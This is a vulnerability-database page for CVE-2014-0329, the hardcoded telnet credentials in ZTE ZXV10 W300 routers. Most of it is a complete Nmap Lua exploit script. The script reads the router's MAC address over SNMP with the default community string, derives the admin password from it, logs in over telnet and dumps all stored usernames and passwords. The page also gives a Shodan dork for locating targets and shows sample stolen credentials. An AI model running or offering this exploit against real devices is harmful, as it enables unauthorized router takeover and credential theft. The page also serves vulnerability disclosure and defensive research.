Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

ZTE ZXV10 W300 Router信任管理漏洞

🗓️ 11 Feb 2014 00:00:00Reported by RootType 
seebug
 seebug🔗 www.seebug.org👁 101 Views

ZTE ZXV10 W300 router contains hardcoded credentials that are useable for the telnet service on the device. The username is "admin" and the password is "XXXXairocon" where "XXXX" is the last four characters of the device's MAC address. The MAC address is obtainable over SNMP with community string public

Related
Code
ReporterTitlePublishedViews
Family
0day.today		ZTE ZXV10 W300 Router - Hardcoded Credentials
9 Feb 201400:00
zdt
CVE		CVE-2014-0329
4 Feb 201402:00
cve
Cvelist		CVE-2014-0329
4 Feb 201402:00
cvelist
Exploit DB		ZTE ZXV10 W300 Router - Hard-Coded Credentials
9 Feb 201400:00
exploitdb
exploitpack		ZTE ZXV10 W300 Router - Hard-Coded Credentials
9 Feb 201400:00
exploitpack
NVD		CVE-2014-0329
4 Feb 201405:39
nvd
OpenVAS		ZTE ZXV10 W300 Wireless Router Hardcoded Credentials Security Bypass Vulnerability (SNMP/Telnet)
10 Feb 201400:00
openvas
Packet Storm		ZTE ZXV10 W300 Hardcoded Credentials
9 Feb 201400:00
packetstorm
Prion		Hardcoded credentials
4 Feb 201405:39
prion
seebug.org		ZTE ZXV10 W300 Router - Hardcoded Credentials
1 Jul 201400:00
seebug
Rows per page

                                                # Exploit Title: ZTE ZXV10 W300 router contains hardcoded credentials
# Date: 03 Feb 2014
# Exploit Author: Cesar Neira
# Vendor Homepage: http://wwwen.zte.com.cn/
# Version: ZTE ZXV10 W300 v2.1
# CVE : CVE-2014-0329
# Dork (Shodan): Basic realm="index.htm"
# References:
http://alguienenlafisi.blogspot.com/2014/02/hackeando-el-router-zte-zxv10-w300-v21.html
 
 
local nmap = require "nmap"
local stdnse = require "stdnse"
local snmp = require "snmp"
local vulns = require "vulns"
 
description = [[
ZTE ZXV10 W300 router contains hardcoded credentials that are useable for the
telnet service on the device. The username is "admin" and the password is
"XXXXairocon" where "XXXX" is the last four characters of the device's MAC
address. The MAC address is obtainable over SNMP with community string public.
]]
author = "Cesar Neira"
license = "Same as Nmap--See http://nmap.org/book/man-legal.html"
categories = {"vuln", "exploit", "intrusive"}
 
---
--
-- @usage nmap -sU -sS -p U:161,T:23 --script=airocon example.org
-- @output
-- PORT    STATE         SERVICE
-- 23/tcp  open          telnet
-- 161/udp open|filtered snmp
-- 
-- Host script results:
-- | airocon: 
-- |   VULNERABLE:
-- |   ZTE ZXV10 W300 router contains hardcoded credentials
-- |     State: VULNERABLE (Exploitable)
-- |     IDs:  CVE:CVE-2014-0329
-- |     Risk factor: High  CVSSv2: 9.3 (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C)
-- |     Description:
-- |       ZTE ZXV10 W300 router contains hardcoded credentials that are useable for the telnet
-- |       service on the device. The username is "admin" and the password is "XXXXairocon"
-- |       where "XXXX" is the last four characters of the device's MAC address. The MAC address
-- |       is obtainable over SNMP with community string public.
-- |     Disclosure date: 2014-2-3
-- |     Exploit results:
-- |       admin:1234
-- |       support:1234
-- |       admin:0E91airocon
-- |     References:
-- |       http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0329
-- |       http://alguienenlafisi.blogspot.com/2014/02/hackeando-el-router-zte-zxv10-w300-v21.html
-- |_      http://www.kb.cert.org/vuls/id/228886
 
-- @args community SNMP community (Default: public)
--
---
 
 
local DEFAULT_COMMUNITY = "public"
 
 
hostrule = function(host)
    local snmp_port, telnet_port
     
    snmp_port = nmap.get_port_state(host, {number=161, protocol="udp"})
    if not snmp_port  and not (snmp_port.state == "open" or snmp_port.state == "open|filtered") then
        return false
    end
     
    telnet_port = nmap.get_port_state(host, {number=23, protocol="tcp"})
    if not telnet_port and not telnet_port.state == "open" then
        return false
    end
     
    return true
end
 
 
local get_mac = function(host, community)
    local socket, status, response
     
    socket = nmap.new_socket("udp")
    socket:set_timeout(5000)
 
    status, response = socket:connect(host, 161)
     
    if not status then
        socket:close()
        return status, response
    end
     
    local payload, request
 
    request = snmp.buildGetRequest({}, ".1.3.6.1.2.1.2.2.1.6.10000")
    payload = snmp.encode(snmp.buildPacket(request, 0, community))
     
    status, response = socket:send(payload)
     
    if not status then
        socket:close()
        return status, response
    end
     
    status, response = socket:receive_bytes(1)
     
    if not status then
        socket:close()
        return status, response
    end
     
    socket:close()
     
    local result
    result = snmp.fetchFirst(response)
     
    if not result then
        return false, "Unexpected response value."
    end
     
    return true, stdnse.tohex(result)
end
 
 
local dump_creds = function(host, user, password)
    local socket, status, response
     
    socket = nmap.new_socket("tcp")
    socket:set_timeout(5000)
     
    status, response = socket:connect(host, 23)
     
    if not status then
        socket:close()
        return status, response
    end
     
    local payload
    payload = user .. "\r" .. password .. "\rsh\rlogin show\rexit\r"
     
    status, response = socket:send(payload)
     
    if not status then
        socket:close()
        return status, response
    end
     
    status, response = socket:receive_buf("exit", false)
     
    if not status then
        socket:close()
        return status, response
    end
     
    socket:close()
     
    return true, response
end
 
 
local parse_response = function(response)
    local index
     
    index = string.find(response, "Username +Password +Priority")
     
    if not index then
        return false, "Unexpected response value."
    end
 
    index = string.find(response, "\r\n", index) + 2
    response = string.sub(response, index)
 
    local result, endl, line
    result = {}
     
    index = 0
    endl = string.find(response, "\r\n", index)
 
    while endl do
        line = string.sub(response, index, endl)
        line = string.gsub(line, "\r", "")
        line = string.gsub(line, "^ +", "")
        line = string.gsub(line, " +$", "")
        line = string.gsub(line, " +", " ")
         
        local user, pass, prio
        for user, pass, prio in string.gmatch(line, "([^ ]+) ([^ ]+) ([^ ]+)") do
            local aux = {}
            aux['username'] = user
            aux['password'] = pass
            aux['priority'] = prio
            table.insert(result, aux)
        end
         
        index = endl + 2
        endl = string.find(response, "\r\n", index)
    end
     
    return true, result
end
 
 
action = function(host)
    local vuln = {
        title = "ZTE ZXV10 W300 router contains hardcoded credentials",
        state = vulns.STATE.NOT_VULN,
        IDS = {CVE = 'CVE-2014-0329'},
        risk_factor = "High",
        scores = {
            CVSSv2 = "9.3 (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C)",
        },
        description = [[
ZTE ZXV10 W300 router contains hardcoded credentials that are useable for the telnet
service on the device. The username is "admin" and the password is "XXXXairocon"
where "XXXX" is the last four characters of the device's MAC address. The MAC address
is obtainable over SNMP with community string public.]],
        references = {
            "http://www.kb.cert.org/vuls/id/228886",
            "http://alguienenlafisi.blogspot.com/2014/02/hackeando-el-router-zte-zxv10-w300-v21.html"
        },
        dates = {
            disclosure = {year = 2014, month = 2, day = 3},
        },
        exploit_results = {},
    }
 
    local community
    community = stdnse.get_script_args(SCRIPT_NAME .. ".community") or DEFAULT_COMMUNITY
     
    local status, response
     
    status, response = get_mac(host, community)    
    if not status then
        return response
    end
     
    local password
    password = string.upper(string.sub(response, 9)) .. "airocon"
     
    status, response = dump_creds(host, "admin", password)
    if not status then
        return response
    end
     
    status, response = parse_response( response )
    if not status then
        return response
    end
     
    vuln.state = vulns.STATE.EXPLOIT
    for _, data in pairs(response) do
        table.insert(vuln.exploit_results, data.username .. ":" .. data.password)
    end
     
    return vulns.Report:new(SCRIPT_NAME, host):make_output(vuln)
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
11 Feb 2014 00:00Current
6.5Medium risk
Vulners AI Score6.5
EPSS0.25021
zte zxv10 w300hardcoded credentialstelnet servicesnmpmac addresscesar neiracve-2014-0329exploit
101